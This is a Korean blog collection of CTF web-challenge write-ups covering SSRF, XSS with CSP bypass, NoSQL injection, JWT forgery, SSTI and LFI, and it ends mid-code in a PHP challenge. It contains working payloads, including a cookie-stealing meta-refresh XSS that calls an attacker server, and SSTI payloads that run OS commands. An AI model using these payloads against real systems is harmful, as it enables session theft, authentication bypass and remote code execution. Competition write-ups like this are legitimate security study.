'CTF/Writeup'에 해당되는 글 119건

해당 대회는 참여를 못해서 대회 끝나고 웹 문제가 열려있길래 풀어봤다.

Rosé Garden

문제에 들어가보면 아래와 같이 SSRF로 보이는 기능하나가 보인다. 근데 이 기능만 가지고 뭐 터트려보려고 하면 아무것도 안된다. 여기서 좀 헤매다 robots.txt 보니까 소스가 있길래 다운받아보니 아래와 같았다.

app.py

#!/usr/bin/env python

from flask import Flask, render_template, request, send_from_directory, abort

from concurrent.futures import ThreadPoolExecutor

from urllib.parse import urlparse

from socket import inet_aton

import requests

import asyncio

app = Flask(__name__)

app.jinja_env.lstrip_blocks = True

app.jinja_env.trim_blocks = True

async def check_func(hostname, port):

    try:

        if len(hostname.split('.')) != 4: 0/0

        if '127.' in hostname or '.0.' in hostname or '.1' in hostname: 0/0

        if inet_aton(hostname) != b'\x7f\x00\x00\x01': 0/0

        if not port: port = 80

        result = []

        with ThreadPoolExecutor(max_workers=3) as executor:

            loop = asyncio.get_event_loop()

            tasks = [

                loop.run_in_executor(

                    executor,

                    lambda u: requests.get(u, allow_redirects=False, timeout=2),

                    url

                ) for url in [f'http://{hostname}:{port}', 'http://127.0.0.1:3333']

            ]

            for res in await asyncio.gather(*tasks):

                result.append(res.text)

    except:

        return False

    return result[1] if result[0] == result[1] else False

@app.route('/<path:path>')

def send_static(path):

    return send_from_directory('static', path)

@app.route('/')

def index():

    return render_template('index.html')

@app.route('/request', methods=['GET', 'POST'])

def request_page():

    if 'url' in request.form and request.form['url']:

        url = request.form['url']

        if url[:7] != 'http://':

            url = 'http://' + url

        host_info = urlparse(url)._hostinfo

        asyncio.set_event_loop(asyncio.new_event_loop())

        loop = asyncio.get_event_loop()

        FLAG = loop.run_until_complete( asyncio.ensure_future( check_func(*host_info) ) )

        if FLAG:

            return render_template('request.html', flag=FLAG)

        else:

            return render_template('request.html', error=True)

    return render_template('request.html')

if __name__ == '__main__':

    app.run(host='0.0.0.0', port=80, debug=False)

def check_func 함수 내부의 필터링 로직이 존재한다.

127.0.0.1:3333에 접근해야 하는데 아래 코드로 인해 필터링을 당하고있다.

if '127.' in hostname or '.0.' in hostname or '.1' in hostname: 0/0

if inet_aton(hostname) != b'\x7f\x00\x00\x01': 0/0

ip를 10진수대신 16진수로 대체해주면 해당 필터가 우회된다.

payload = http://0x7f.0x0.0x0.0x1:3333

Flag = ISITDTU{warmup task is not that hard}

XSS Game 1

문제에 들어가보면 간단한 Reflectd XSS가 터지는 기능이 하나 나온다. 

취약점이 터지는 코드는 아래와 같다.

/*** We prevent change the location ***:

<script>Object.freeze(location);</script>input<br><script>location='http://input';</script>

input이 두 군데 지점에 들어가고 Object.freeze로 location 객체를 통한 redirect를 필터링하고 있다.

필터 당하는 문자열을 보면 `,' 이거 두가지 정도라 그냥 XSS 터트리면 될 것 같은데 Chrome XSS Auditor랑 CSP가 적용되어 있다.

최종적으로 해야할건 Chrome XSS Auditor Bypass + CSP Bypass + locaion filter Bypass 정도였다.

먼저 XSS auditor는 `가 필터링되고 있지만 인풋이 개행없이 하나의 라인 2군데 지점에 들어가서 "를 통해 우회해줬다.

";alert(1);//<script>

그다음 CSP와 같은 경우는 아래와 같이 세팅되어 있었다.

default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval';sandbox allow-scripts allow-same-origin

기본적인 resource load 정책이 다 self로 되어있었고 sandbox 정책까지 적용되어 있었다. 여기다 location까지 필터당하고 있어서 위 두가지에 필터안되는 구문을 찾아야했다.

location 외에 redirection을 만드는 html 구문 몇개를 테스트 해보니 csp에 안걸리는 구문을 찾을수 있었다.

window.open <- filter (csp allow-popups) 

form action <- filter (csp allow-forms)

a tag href <- filter bypass

meta tag refresh <- filter bypass

payload =  http://165.22.52.11/XSSGAME1/?pl=";a=document.createElement("meta");a.httpEquiv="refresh";a.content="0;url=http://my_server/?"%2bdocument.cookie;document.body.appendChild(a);//<script>"

Flag = ISITDTU{0274fdcad72fb003e36bb77d9ef2279b3eb3f519}

최근들어서 버그헌팅에 빠져서 문제도 거의 못보고 블로그에 글 남길 일도 없었는데 주말에 Google CTF가 열렸길래 오랜만에 문제 구경을 좀 해봤다. 

해당 문제는 대회기간에 도저히 취약점 트리거할 포인트 자체가 안보여서 어떻게 취약점이 터지는건지 엄청 궁금했는데 대회종료 후 롸업에서 취약점 트리거되는 포인트가 엄청 신선하고 재미있어서 정리해봤다. 

문제를 보면 아래와 같이 엄청 간단한 기능 하나가 존재한다. 

도시 이름으로 검색을 하면 해당 도시에 대한 정보를 뿌려주는 형태인데 실제 요청되는 데이터는 아래와 같은 형태였다.

요청되는 파라미터 값을 보면 숫자로 이루어진걸 볼 수 있는데 해당 값은 아래 js 코드를 통해 생성된다.

post.js

function AjaxFormPost() {

  var datasend;

  var message = document.getElementById('message').value;

  message = message.toLowerCase();

  var blindvalues = [

    '10',    '120',   '140',    '1450',   '150',   '1240',  '12450',

    '1250',  '240',   '2450',   '130',    '1230',  '1340',  '13450',

    '1350',  '12340', '123450', '12350',  '2340',  '23450', '1360',

    '12360', '24560', '13460',  '134560', '13560',

  ];

  var blindmap = new Map();

  var i;

  var message_new = '';

  for (i = 0; i < blindvalues.length; i++) {

    blindmap[i + 97] = blindvalues[i];

  }

  for (i = 0; i < message.length; i++) {

    message_new += blindmap[(message[i].charCodeAt(0))];

  }

  datasend = JSON.stringify({

    'message': message_new,

  });

  var url = '/api/search';

  xhr = new XMLHttpRequest();

  xhr.open('POST', url, true);

  xhr.setRequestHeader('Content-type', 'application/json');

  xhr.onreadystatechange =

      function() {

    if (xhr.readyState == 4 && xhr.status == 200) {

        console.log(xhr.getResponseHeader('Content-Type'));

        if (xhr.getResponseHeader('Content-Type') == "application/json; charset=utf-8") {

            try {

                var json = JSON.parse(xhr.responseText);

                document.getElementById('database-data').value = json['ValueSearch'];

            }

            catch(e) {;

                document.getElementById('database-data').value = e.message;

            }

        }

        else {

            document.getElementById('database-data').value = xhr.responseText;

        }

    }

}

      xhr.send(datasend);

}

해당 대회는 사정상 참여를 못해서 대회 종료 후 문제를 풀어봤다.

먼저 문제에서 제공해주는 페이지에 들어가보면 간단한 패스워드 입력창만 있고 따로 동작을 안한다. 근데 소스를 보면 주석에 아래와 같은 구문이 있다.

<!-- | Dark Web Message Board | DEVELOPED BY K1tsCr3w | Open source at Kits-AB | -->

해당 구문을 참조해 github에서 Kits-AB를 찾아보면 문제 사이트의 소스가 공개되어 있다.

app.py

import os

from model import init_database, Post

from flask import render_template, Flask, send_from_directory, request

init_database()

app = Flask(__name__, static_folder='static')

@app.route('/robots.txt')

def static_from_root():

    return send_from_directory(app.static_folder, request.path[1:])

@app.route("/")

def index():

    return render_template("login.html")

@app.route("/boards/<id>")

def board(id):

    posts = []

    if int(id) == 1:

        posts = Post.select()

    return render_template("board.html", posts=posts)

if __name__ == "__main__":

    if os.environ.get("FLASK_DEBUG"):

        app.run(debug=True)

    else:

        app.run()

메인 코드인데 보면, boards/1 경로에 접근하면 뭔가 데이터를 읽어서 뿌려주는걸 볼 수 있었다. 해당 페이지에 접근해보면 아래와 같이 여러 데이터들이 보이는데 그 중 암호화 된 값 하나가 보이는걸 볼 수 있었다.

해당 문제가 web+crypto+osint 였기 때문에 해당 암호문을 일단 디크립트 해야할 거라는 생각이 들었다. crypto는 공부를 거의 안해봐서 그만볼까 했는데 깃헙 소스에서 디크립트 하는 코드를 아래와 같이 제공해줘서 좀 더 풀어봤다.

test_crypto.py

from cryptography.hazmat.backends import default_backend

from cryptography.hazmat.primitives.asymmetric import rsa, padding

from cryptography.hazmat.primitives import serialization, hashes

import base64

import unittest

# Maybe this could be used to encrypt the secret messages in the board? 

# https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/

MESSAGE=b"Something secret"

PEM_PASSWORD=b'aVerySecretPassword'

PEM_PRIVATE_KEY=b"""-----BEGIN ENCRYPTED PRIVATE KEY-----

MIIFHTBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQIeJ8sEumQimECAggA

MAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBCoq4tCJ4RHgmF8/Ayi+gRMBIIE

wA/ByLKYec9EnYxdklKLK3nnilG17fYrEeXGhkRy0tHuxDDJFrvZXANyiakSnj/r

0Ly52heKxEkXYTQ8ohJR5Fezn8KXLYJVdvkJkAGURiVICPb10f1m7UwqakPSt4Hk

nwXZRXYDyiNyUoMgIdxxpaNvl0h6GotOaa/CvcACnozZxiZv3X7f9+0y7zKYA+i8

lM5qaiFjz06LdQ0+MvSxqpC0lKbEJTrTvd95TsdkwNppoQQXU4p/CiGtrRC3DmCd

YZCSLAm7mlVfpnP2wcN7rX3rPQtlb0LCiWbLw2DmKaAbgW4yiqP12+yX0cegxZPH

KuvBtqDOEODDhro/j/VBSizhZxB9xgpsd1ZVdmIUGHmsckEg0pmHcOmb+L3/UwCX

6WI5HMecRk2miNnjZt19YPAdJJ0CNURnqkRMKw5dhy1e3V2+W1K2ojICJj7gZaSh

Hclt3VbwbjAQNwPUU2kkJWCQFDAjLnEmOgZEzESuo58kt3WyurJbeC5H5irTRlaT

jP9jCOvbuE2P4JR5ErOx5wxbMhI+UEVdcuHYGXoyJKLatg+i8W82BV+RQA9d7Bmq

qKdEWtLCD0IT9eCCm//M6iZiVHuDGjxgZVfvzaU7yHMdZdVi5mKfxHeIcGyrolVu

LDsOrjZ9aHtgVycMGjpltYdhJpTlP3Z2Otby18H0bUv1ntsRBZdx2lle8A1Jre1n

10DH5Lx5rn7prJuj/IL1q/Z4lcDlkvHI6I0m/rauXyddGcUrINTTWq9ujQ8x09Gt

NbLeoMOLy39H55W/T7VO+ds1kEOObE5lYwh0Jo29LpHLlKKpKVx23IHBTjC5LEAV

4qynUw1BLK1klEClZp9AfTAfz5M9AjK50l3MEEwIW48eS3U6h137Of3QirMjiE82

iFANV3rOYdsmQAtDeWxx+N3sLv8kK8ANnr85Dj9QOXQJtAm9S7UZM9BrwIgmOuVL

9r9Pt5J8B0lAwPQ5+sxTfgPrd0FhZSZYzrelbp0ck4odSnXFK+ZL0E1VWIBXUtTd

oj5lFFs9U95vXU5szx17xB+IMd2KOKIirIEwCm3TIa58sMbhLxDJtWpqlFVztg/E

zBeD3dzvhJzitTzKvFYTrzbge+o3/dK2+yFbibE0VTAGV60ILoZq5kLVqYgihk8I

7UHLw7ugunteNLXBpB2QEvETGXhjPu82dqZFS4q+KQkIm6n6XCh1oe/CpLg08Zzh

fAWLBv1OSs/tL9cRUWhY0JxcksP6jZrhNgBzqmN4mIeQ8BfaVQbgEaD/r0c4HgS/

68dRofW02JsfaNy0qgtnsWIvAez/2gq4Sryo3NJMX0V5YogmNAWl4dsonXVE5Yss

mR/0xgLIRqKB2S32ycBjCg0BJNDJE8KSpWZHPTZxel5NQqvOUzfoc7fA2B01OhQJ

EGRgwpp+4kPEU4cZz0FUN7Yv7YRWdkVgd0BJVHVdwog1/mX3hz5SktYoU9mzuuEV

COm52E8EDJmH+eDDmOcFoXDx9rV8vcnf8AMDE1eGRxuF6YjrdsOEhaCBaQXdB+0f

S2eccZTxfvwVCsVUsy2WrWJ6+C1qG7g3vsFiKy72eWjZ1BE5k1KZ/AMxQRi4wraL

jmt95WyzLVitJ54jC6KqXZQ=

-----END ENCRYPTED PRIVATE KEY-----"""

ENCRYPTED_MESSAGE=('KA6I/Hu3sUWtPIvqmWEUHctAtDwWm7ZSg1GhTOwZMOgZhxi+WobWX+Q+J4Mym9zW9CwKZnILBi9tP'

        '+fXkionJC3U4A7APl6MPjtbkSPTqB6BXPug57dOVH2bKoyGCOkb1Y7GGs/wIVCebDyRH8katXP99q80y8Mr7wzw'

        '+xL7dNcn01Ho6xYZQlbakqJOl2UCorFGReOryGgNfhYxnHWmSDkQDtFBsB/RnexqftYLVrnPiStwALsoO8eYLsI'

        '1wnI1kmr5acbAFcW1G/0x4EZ/iouVu0EYisgQ8GXcwoed3wgQhUdrFAmI6DcbElza6QveNXCSsIIwjLWpzI2NrwPjYg==')

DEFAULT_PADDING=padding.OAEP(

    mgf=padding.MGF1(algorithm=hashes.SHA256()),

    algorithm=hashes.SHA256(),

    label=None

)

class TestEncryption(unittest.TestCase):

    def test_encryption_decryption(self):

        private_key = rsa.generate_private_key(

            public_exponent=65537,

            key_size=2048,

            backend=default_backend()

        )

        ciphertext = private_key.public_key().encrypt(

            MESSAGE,

            DEFAULT_PADDING

        )

        plaintext = private_key.decrypt(

            ciphertext,

            DEFAULT_PADDING

        )

        self.assertEqual(plaintext, MESSAGE)

    def test_generate_private_key(self):

        private_key = rsa.generate_private_key(

            public_exponent=65537,

            key_size=2048,

            backend=default_backend()

        )

        private_pem = private_key.private_bytes(

            encoding=serialization.Encoding.PEM,

            format=serialization.PrivateFormat.PKCS8,

            encryption_algorithm=serialization.BestAvailableEncryption(PEM_PASSWORD)

        )

        # print(private_pem.decode())

    def test_encryption(self):

        private_key=serialization.load_pem_private_key(

            PEM_PRIVATE_KEY,

            password=PEM_PASSWORD,

            backend=default_backend()

        )

        ciphertext = private_key.public_key().encrypt(MESSAGE, DEFAULT_PADDING)

        encoded_cipher = base64.b64encode(ciphertext)

        # print(encoded_cipher)

        # print(encoded_cipher.decode())

    def test_decryption(self):

        private_key = serialization.load_pem_private_key(

            PEM_PRIVATE_KEY,

            password=PEM_PASSWORD,

            backend=default_backend()

        )

        plaintext = private_key.decrypt(

            base64.b64decode(ENCRYPTED_MESSAGE.encode("utf-8")),

            DEFAULT_PADDING

        )

        #print(plaintext)

        self.assertEqual(MESSAGE, plaintext)

if __name__ == '__main__':

    unittest.main()

코드에서 private key랑 password가 하드코딩으로 박혀있길래 암호화 값만 바꿔서 돌려봤는데 패스워드가 틀렸는지 정상적으로 복호화가 안됬다.

해볼만한게 딱히 안떠올라서 그냥 dictionary attack으로 사전파일 받아다 브루트 포스 돌렸는데도 복호화가 안됬다.

여기서 뭐지하다 깃헙 소스를 좀더 보다보니 commits이 3번 있었던게 눈에 들어왔다.

3번의 커밋 중 removed the production key, luckily it was encrypted with a password … 라는 커밋이 눈에 들어왔고 확인해보니 private key가 변경되었던 걸 확인할 수 있었다.

변경 전 private key를 통해 아래 코드로 브포를 돌리니까 암호화된 값이 복호화가 되었다.

decrypt.py

from cryptography.hazmat.backends import default_backend

from cryptography.hazmat.primitives.asymmetric import rsa, padding

from cryptography.hazmat.primitives import serialization, hashes

import base64

import unittest

PEM_PRIVATE_KEY = b"""-----BEGIN ENCRYPTED PRIVATE KEY-----

MIIFLTBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQIF+TK17Q9CAsCAggA

MAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBCebicNIgfA441g2E3t3z/oBIIE

0OAMyvjZ8MaFDLJzuzDY3RWHP0IHWiHoCBNxPJWySon/tLXoizSbsj8EKtgA0MpE

vORC4QdnKg7bqplAAXfSIRli9Hb7RcuMpKv5buW3/Oh/th8NWWM9LOQOBAO0svlR

pJhA5hZSKEgEJMd1E77mjv29gHMEzRgXvAsTOZXhgbbtPnIkQGPXZq4hXyhy0VBt

9cCevKYLgVFahIARjejN+KErNiSN0f76mc62wunum+J6uGtk/HYZ00ZsFcf/0x7B

O/8hrFsliAg+2izNLVWy/+b1oCkuaMIEZ0zXjse3iZirSmWs6F5tFGh2w5lnJB1G

hJAqTjhHdvPWpwiyTw4nCG7+FDd3v1Ih+v8Qq9evlkYg1rdwh13ymGcfko3y7p2l

SuQsJ94i5NEv4acgIE70fqXrwzbSlc+QB5RtKexMj0NxWCySe9seLQP9fbCxp6Ci

a8mHS/4hF7hBbH984QJxy7aqt+U/xLQrKkkp2Lf0KYfthmiS13e7ZEtNSzd3dxZv

eVnDNSzEh/ty/+yt5bx58AlmhNigkaPX+KrTYt1KgQBrgYyk/YNEWK8GE0Sq/4KL

uEiIa0mpbn9je7szIA9egwjIqLWasBoG1HOb5dOu/azhVoM8mheEik/FQLHhgZlo

ZoFY8Rb3jO3Mv/sod1tQE6IteAkBsfXGT8QNaJHMAjmf96aNA8y0bStpHm1ZzpzW

qX3xcr6bDAt4olonDZ1DNTZh4AnSCnKM8LM6kwwY0r8q13EHJ2Ek6L0Vh+BiIeNw

7Q/jQ1thXzrYv9e5KU5TmvZAvtXoqcUCmI2ehnOq6xmir07g4tPQIHyolbY8EHw1

r/mb3me1+8lPdvjKSCM/LqI04h3GPkfnXWwPwlBL4sd5mnKRunLHcnLDu2AVRE+R

r8DvGGIMNr+LZjxZIdjhMraR6VSSTXX028Lamz40ZY9gn3vQWeIJAi0S7g/TW+TJ

RwXGW5gmLfbzlkzgvXPRPfjk9EeBtcS4Pj7q2QIrrAdZZFCC4z5uRGmMHC/tv2/p

IYpV2kClKcnNuPvQSreJXB18GJo1VJU/o78/Hi/cr1atiERM38gP1FYk08vcwjwT

Av62VWaTXsuAsOzS/fjmSsyAlv0LN8pNJ6j3uvk+bOrbKS4V7aM0oHDhLtlJThN5

dagcklxP1VgRAXQPdGUz1oEZzoKezPxq2mJCj8QAPZFkat5mRzbUum0aAr3Yn7Vq

KLGrILx8p4sToqfiKMnayU/QCpgifgJbMun9pSvdOC40b8xUIeuN0PlIkLueA4Mu

o4pbU2inYbC+vEB3c1fHaki+Z0+jUuHyIWtEBJOD6VNYx1LU3HY6T7eV8t/8oJxi

LZCxhon+/R9kEgJO0ofp0362pFm5i1V1afzjFMAhFK4khFNdZJ6rJLrymg1ueCsx

sxSv8x8EA/ZykDJs4M/E5eSiZI9ZmrCsIrUXZ7QGjguqHXnHi7wsO3RSa2c8Bl+t

+SYlmqK5U55yHZ23rJIS/XNIaMB+mX0CHnx/+rohABcueD7Hz7Q0OHP34NuPwK3x

NAx6x4Yfrw2SiYd0Nj15N8oexI+u6/tahCL2obap9S1Y7zibfNgJs4d2yi3F3A+w

Fe+whD+k+txSfs6w50MFgI4JG2Hu6dLtdQC5FSyOAYDJ

-----END ENCRYPTED PRIVATE KEY-----"""

ENCRYPTED_MESSAGE = ('rW+fOddzrtdP7ufLj9KTQa9W8T9JhEj7a2AITFA4a2UbeEAtV/ocxB/t4ikLCMsThUXXWz+UFnyXzgLgD9RM+2toOvWRiJPBM2ASjobT+bLLi31F2M3jPfqYK1L9NCSMcmpVGs+OZZhzJmTbfHLdUcDzDwdZcjKcGbwEGlL6Z7+CbHD7RvoJk7Ft3wvFZ7PWIUHPneVAsAglOalJQCyWKtkksy9oUdDfCL9yvLDV4H4HoXGfQwUbLJL4Qx4hXHh3fHDoplTqYdkhi/5E4l6HO0Qh/jmkNLuwUyhcZVnFMet1vK07ePAuu7kkMe6iZ8FNtmluFlLnrlQXrE74Z2vHbQ==')

DEFAULT_PADDING = padding.OAEP(

    mgf=padding.MGF1(algorithm=hashes.SHA256()),

    algorithm=hashes.SHA256(),

    label=None

)

def test_decryption(password):

    try:

        private_key = serialization.load_pem_private_key(

            PEM_PRIVATE_KEY,

            password=password,

            backend=default_backend()

        )

        plaintext = private_key.decrypt(

            base64.b64decode(ENCRYPTED_MESSAGE.encode("utf-8")),

            DEFAULT_PADDING

        )

        print("Find Password = " + password)

        print("Find Decrypt Text = " + plaintext)

        exit()

    except:

        tmp = 0

f = open("C:\Users\Administrator\Desktop/rockyou.txt","r")

i = 0

password = f.read()

pass_list = password.split("\n")

print len(pass_list)

for i in xrange(len(pass_list)):

    test_decryption(pass_list[i])

 http://bankofsweden-01.pwn.beer:5000 경로로 들어가보니 아래와 같이 사이트가 하나 나왔다. 

기능 중에 로그인 및 회원가입 기능이 있었는데 그냥 회원가입 후 로그인해보면 계정 활성화가 안되었다고 나왔다. 그래서 계정명으로 사용한 이메일로 활성화 메일이 오나 했는데 아무것도 오는게 없었다. 여기서 취약점을 터트려야하나 싶어서 보니 회원가입 할 때 is_active란 파라미터가 있었다. 해당 파라미터를 true로 세팅하고 회원가입해주면 로그인이 되었다.

로그인 후 사이트를 쭉 보다보면 export하는 기능을 사용할 때 아래와 같이 lfi가 터지는걸 볼 수 있었다.

대충 lfi로 아래 순서로 파일을 쭉쭉 leak하다보면 아래와 같이 app.py 파일에 플래그가 존재하는 걸 볼 수 있었다.

/proc/self/environ

/proc/self/cmdline

/home/bos/ctf/app.py

대회때 솔버가 몇백명이었던 엄청 쉬운 웹 문제였는데 풀지를 못했다..ㅠㅠ 

문제를 보면 아래와 같이 설명을 해주는 구문이 있었고 따로 문제 링크나 이런건 없었다.

You know, we had this up and everything. Prepped nice HTML5, started deploying on a military-grade-secrets.dev subdomain, got the certificate, the whole shebang. Boss-man got moody and wanted another name, we set up the new names and all. Finally he got scared and unplugged the server. Can you believe it? Like that can keep it secret...

이걸보고 나는 military-grade-secrets.dev subdomain을 군사기밀급으로 개발한 subdomain 이라는 말도안되는 형태로 이해를 했다.. dev라는  최상위 도메인이 있다는걸 모르고 설마 저게 도메인일까라는 상상을 매우 잠시했다가 바로 머리속에서 지워버렸었다. 

그리고나서 그럼 무슨 도메인의 subdomain을 찾아야되지 하다가 뭔가 제시한 도메인이 없길래 그냥 데프콘 서버의 도메인을 기준으로 *.oooverflow.io , *.scoreboard.oooverflow.io , *.www.oooverflow.io 이런걸 찾고있었다. 근데 bruteforcing 모드까지 써가면서 찾았는데 도저히 뭐가 안나왔다. 

여기서 멘탈나가고 도저히 감이안와서 결국 포기했었다.

대회 종료 후 롸업을 보니 찾을 military-grade-secrets.dev 도메인의 subdomain을 찾으면 되는거였다. 요즘 문제풀 때 자꾸 여러가지 가정을 안세우고 고정된 관념으로 문제에 접근하는 안좋은 버릇이 생겼는데 빨리 고쳐야겠다고 느꼈고 많이 반성했다.

문제를 보면 해당 도메인의 subdoamin을 sublist3r로 찾아보면 아래와 같이 딱봐도 수상한 놈이하나 보인다.

검색결과 나온 secret-storage.military-grade-secrets.dev로 들어가보면 https://forget-me-not.even-more-militarygrade.pw/ 여기로 리다이렉트가 된다. 

근데 해당 사이트는 실제로 존재하지 않는다, 문제 설명처럼 존재했다가 제거된 형태이기 때문에 아카이브된 형태로 존재할 가능성이 높아 Wayback Machine에서 해당 사이트를 찾아보니 과거에 존재했던 페이지에 접근이 가능했고 아래와 같이 플래그가 있었다.

Control You

소스보기하면 플래그가 있다.

No Sequels

로그인 창 하나가 나오는데 nosql injection이 터진다. 근데 요청 폼을 보면 username=1&password=1 이런식으로 넘어가는데 이걸 json형태로 변경하고 요청 헤더 값에 Content-Type을 application/json로 변경해서 json 요청폼으로 넘겨주면 된다.

payload

{"username":{"$ne":"1"},"password":{"$ne":"1"}}

No Sequels 2

이전 문제랑 같은 Nosql 문젠데 블라인드로 admin password를 뽑아야 된다. 그냥 regex써서 대충 아래같은 형태로 뽑아주면 된다.

payload

{"username":"admin","password":{"$regex":"^c"}}

DOM Validator

XSS 문젠데 특이하게 스크립트가 박히는 페이지에 아래 js코드로 돔 내 요소들에 있는 속성들의 값을 가지고 checksum값을 만든다. 이 값이 3b16c602b53a3e4fc22f0d25cddb0fc4d1478e0233c83172c36d0a6cf46c171ed5811fbffc3cb9c3705b7258179ef11362760d105fb483937607dd46a6abcffc 이 값이랑 같지 않으면 해당 페이지 내 모든 요소들을 제거해버린다.

function checksum (element) {

var string = ''

string += (element.attributes ? element.attributes.length : 0) + '|'

for (var i = 0; i < (element.attributes ? element.attributes.length : 0); i++) {

string += element.attributes[i].name + ':' + element.attributes[i].value + '|'

}

string += (element.childNodes ? element.childNodes.length : 0) + '|'

for (var i = 0; i < (element.childNodes ? element.childNodes.length : 0); i++) {

string += checksum(element.childNodes[i]) + '|'

}

return CryptoJS.SHA512(string).toString(CryptoJS.enc.Hex)

}

var request = new XMLHttpRequest()

request.open('GET', location.href, false)

request.send(null)

if (checksum((new DOMParser()).parseFromString(request.responseText, 'text/html')) !== document.doctype.systemId) {

document.documentElement.remove()

}

일단 저 checksum값이랑 동일한 페이지를 만들어내는건 불가능해보였다. 근데 잘 보면 checksum 코드를 타기전에 이미 내가 삽입한 XSS 코드가 실행이 되는 구조였다. 그래서 뭐지이게하고 로컬에서 테스트해보니 그냥 아무코드나 다 박아도 잘 실행이 됬다. 그래서 원격에다가 넣어보니까 이상하게 img tag만 실행이 됬다. 딱히 CSP나 이런것도 없었는데 뭔가 이상했다.

첨엔 img태그를 제외하고 나머지 <frame>,<script> 등은 위의 checksum 코드보다 html이 해석을 늦게해서 해당 태그들은 실행되기전에 체크섬로직에 걸려서 삭제되고 그래서 실행이 안되나 싶었는데 로컬에서해보니 그런것도 아니었다. 그냥 이것저것 넣다가 먹히는 구문이 있어서 풀긴했는데 왜 이놈만 되는지 잘 모르겠다.

payload

<img src=1 onerror="http://myip/"+document.cookie"/>

Cookie Cutter

해당 대회에서 가장 재밌게 푼 문제다. 문제를 보면 일단 소스를 제공해 준다.

source.js

const cookieParser = require('cookie-parser');

const express = require('express');

const crypto = require('crypto');

const jwt = require('jsonwebtoken');

const flag = "[redacted]";

let secrets = [];

const app = express()

app.use('/style.css', express.static('style.css'));

app.use('/favicon.ico', express.static('favicon.ico'));

app.use('/rick.png', express.static('rick.png'));

app.use(cookieParser())

app.use('/admin',(req, res, next)=>{

res.locals.rolled = true;

next();

})

app.use((req, res, next) => {

let cookie = req.cookies?req.cookies.session:"";

res.locals.flag = false;

try {

let sid = JSON.parse(Buffer.from(cookie.split(".")[1], 'base64').toString()).secretid;

if(sid==undefined||sid>=secrets.length||sid<0){throw "invalid sid"}

let decoded = jwt.verify(cookie, secrets[sid]);

if(decoded.perms=="admin"){

res.locals.flag = true;

}

if(decoded.rolled=="yes"){

res.locals.rolled = true;

}

if(res.locals.rolled) {

req.cookies.session = ""; // generate new cookie

}

} catch (err) {

req.cookies.session = "";

}

if(!req.cookies.session){

let secret = crypto.randomBytes(32)

cookie = jwt.sign({perms:"user",secretid:secrets.length,rolled:res.locals.rolled?"yes":"no"}, secret, {algorithm: "HS256"});

secrets.push(secret);

res.cookie('session',cookie,{maxAge:1000*60*10, httpOnly: true})

req.cookies.session=cookie

res.locals.flag = false;

}

next()

})

app.get('/admin', (req, res) => {

res.send("<!DOCTYPE html><head></head><body><script>setTimeout(function(){location.href='//goo.gl/zPOD'},10)</script></body>");

})

app.get('/', (req, res) => {

res.send("<!DOCTYPE html><head><link href='style.css' rel='stylesheet' type='text/css'></head><body><h1>hello kind user!</h1><p>your flag is <span style='color:red'>"+(res.locals.flag?flag:"error: insufficient permissions! talk to the <a href='/admin'"+(res.locals.rolled?" class='rolled'":"")+">admin</a> if you want access to the flag")+"</span>.</p><footer><small>This site was made extra secure with signed cookies, with a different randomized secret for every cookie!</small></footer></body>")

})

app.listen(3000)

코드를 보면 res.locals.flag 값을 true로 만들어주면 된다. 그럼 이제 이게 어떻게 true가 될 수 있는지 보면 되는데 jwt값의 페이로드 내에 perms 키의 value가 admin이면 된다. 

그럼이제 할거는 간단하다. jwt의 payload부분의 user값을 admin으로 바꿔주면 된다.

근데 잘보면 키 값은 랜덤한 32byte값이라 크랙이 불가능하고, 알고리즘이 HS256이어서 RSA256->HS256 요런 패턴도 해당이 안된다. 그럼 남은게 알고리즘 none으로 해서 bypass하는건데 jwt를 디코딩할 때 키 값을 가져와서 검증하는 구조라 이것도 불가능해 보였다. 

근데 잘 보면 디코딩 시 쓰는 key값을 jwt payload부분의 값을 가지고 리스트에서 가져오기 때문에 내가 컨트롤이 가능하고 이걸로 key값에 null값을 박아넣을 수 있다.

첨엔 그냥 리스트범위를 넘어가는 int형 값을 넣어서 undefined를 리턴시키려고 했는데 if(sid==undefined||sid>=secrets.length||sid<0){throw "invalid sid"} 요런 구문으로 필터를 하고 있었다. 그래서 로컬에다 리스트 만들어놓고 테스트 해보니 list['youngsin'] 이런식으로 index에 문자열을 넣어보니 undefined를 리턴해줬다.

이제 필요한건 다 구했고 아래 코드로 변조한 jwt 값을 구해서 넘겨주면 된다.

payload.py

jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwZXJtcyI6InVzZXIiLCJzZWNyZXRpZCI6NDgzMywicm9sbGVkIjoieWVzIiwiaWF0IjoxNTU2MTY1NDQ0fQ.48SNu1UAgwyBWAq-TMfeOMebAwYScUUx575JYkXM3Gk"

header, payload, signature  = jwt.split('.')

# Replacing the ALGO and the payload username

header  = header.decode('base64').replace('HS256',"none")

payload = (payload+"==").decode('base64').replace('user','admin').replace('4833','"youngsin"').replace("yes","no")

header  = header.encode('base64').strip().replace("=","")

payload = payload.encode('base64').strip().replace("=","")

# 'The algorithm 'none' is not supported'

print( header+"."+payload+".")

Flask SSTI인데 필터링이 _ 랑 . 이렇게 두개밖에 없다. 필터가 빡센편이 아니라 아래 페이로드로 우회해서 명령어 실행해주면 된다. 

payload

{{''['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f'][2]['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('ls')['read']()}}

{{''['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f'][2]['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('cat fort\x2epy')['read']()}}

EasyPHP

문제에서 소스를 제공해준다. 간단한 PHP Trick류다.

<?php
$hashed_key = '79abe9e217c2532193f910434453b2b9521a94c25ddc2e34f55947dea77d70ff';
$parsed = parse_url($_SERVER['REQUEST_URI']);
if(isset($parsed["query"])){
    $query = $parsed["query"];
    $parsed_query = parse_str($query);
    if($parsed_query!=NULL){
